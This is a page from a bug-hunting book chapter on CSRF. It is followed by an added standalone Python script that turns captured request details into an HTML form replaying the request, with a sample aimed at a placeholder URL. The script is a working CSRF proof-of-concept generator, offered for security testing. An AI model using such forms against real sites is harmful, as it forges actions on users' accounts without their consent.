Page 122 - Hands-On Bug Hunting for Penetration Testers

Chapter 6: CSRF and Insecure Session Authentication

OK, noting the important information (the HTTP request method, the form encoding, the field data, and so on), let's take a look at what happens when we turn Intercept off and allow the POST request to resolve:

Here's what a successful submission looks like. Critically for us, we can see what value the form submitted through the success message.

Let's feed this information into our csrf_poc_generator.py script, making a few small changes where our important variables are declared so that we can pass them as command-line arguments. With those changes, here's the new version of the top part of our script; notice the new sys and ast packages, and how we're using ast to parse a text representation of a Python list into the actual data structure:

    #!/usr/bin/env python
    import sys
    import ast

    from bs4 import BeautifulSoup, Tag

    def generate_poc():
        # The four positional arguments mirror the request details captured
        # in Burp: HTTP method, form encoding type, form action URL and the
        # field data, in that order.
        method = sys.argv[1]
        encoding_type = sys.argv[2]
        action = sys.argv[3]
        # The fields arrive as the text form of a Python list, e.g.
        # "[('email', 'a@b.c')]"; ast.literal_eval turns that text into
        # a real list while only accepting literals, unlike eval.
        fields = ast.literal_eval(sys.argv[4])


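As an added illustration of the argument handling described above (this is not the book's csrf_poc_generator.py), the following stand-alone script parses the same four positional arguments, validates the fields list that ast.literal_eval returns, and renders the proof-of-concept form with the standard library's html.escape rather than BeautifulSoup. The sample argv, URL and field names are constructed for the example.

```python
#!/usr/bin/env python3
"""Hypothetical sketch: parse captured request details from the command line
and render a proof-of-concept HTML form (standard library only)."""
import ast
import sys
from html import escape

ALLOWED_METHODS = {"GET", "POST"}
ALLOWED_ENCTYPES = {
    "application/x-www-form-urlencoded",
    "multipart/form-data",
    "text/plain",
}


def parse_fields(text):
    """Turn the text form of a Python list, e.g. "[('email', 'a@b.c')]",
    into a list of (name, value) string pairs. ast.literal_eval evaluates
    literals only, so a function call or import in the argument raises
    ValueError instead of running (the reason to prefer it over eval)."""
    try:
        data = ast.literal_eval(text)
    except (ValueError, SyntaxError) as exc:
        raise ValueError("fields must be a Python list literal") from exc
    if not isinstance(data, list):
        raise ValueError("fields must be a list")
    pairs = []
    for item in data:
        if not (isinstance(item, (list, tuple)) and len(item) == 2):
            raise ValueError("each field must be a (name, value) pair")
        name, value = item
        pairs.append((str(name), str(value)))
    return pairs


def parse_request_args(argv):
    """argv mirrors the chapter's positional arguments: script name, method,
    encoding type, action URL and the fields list, in that order."""
    if len(argv) != 5:
        raise ValueError("usage: csrf_poc_generator.py METHOD ENCTYPE ACTION FIELDS")
    method = argv[1].upper()
    enctype = argv[2]
    action = argv[3]
    if method not in ALLOWED_METHODS:
        raise ValueError("unsupported method %r" % method)
    if enctype not in ALLOWED_ENCTYPES:
        raise ValueError("unsupported enctype %r" % enctype)
    return {"method": method, "enctype": enctype, "action": action,
            "fields": parse_fields(argv[4])}


def build_poc_form(req):
    """Render a form that replays the captured request when submitted.
    Every attribute and value is HTML-escaped so captured data cannot
    break out of the markup of the PoC page itself."""
    inputs = "\n".join(
        '  <input type="hidden" name="%s" value="%s">'
        % (escape(name, quote=True), escape(value, quote=True))
        for name, value in req["fields"])
    return (
        '<form id="poc" method="%s" enctype="%s" action="%s">\n%s\n'
        '  <input type="submit" value="Submit">\n</form>\n'
        % (req["method"], escape(req["enctype"], quote=True),
           escape(req["action"], quote=True), inputs)
    )


# Constructed sample invocation (hypothetical target URL and field data).
SAMPLE_ARGV = [
    "csrf_poc_generator.py",
    "POST",
    "application/x-www-form-urlencoded",
    "https://example.test/profile/update",
    "[('email', 'new@example.test'), ('display_name', 'Tester <b>')]",
]

if __name__ == "__main__":
    argv = sys.argv if len(sys.argv) == 5 else SAMPLE_ARGV
    print(build_poc_form(parse_request_args(argv)))
```

Run it with no arguments to see the form generated from the constructed sample, or pass the four values captured from Burp in the same order the chapter's script expects. When the target application accepts the replayed request without a token or origin check, that is the finding to report; the fix on the application side is a per-session CSRF token or SameSite cookies, not anything in this script.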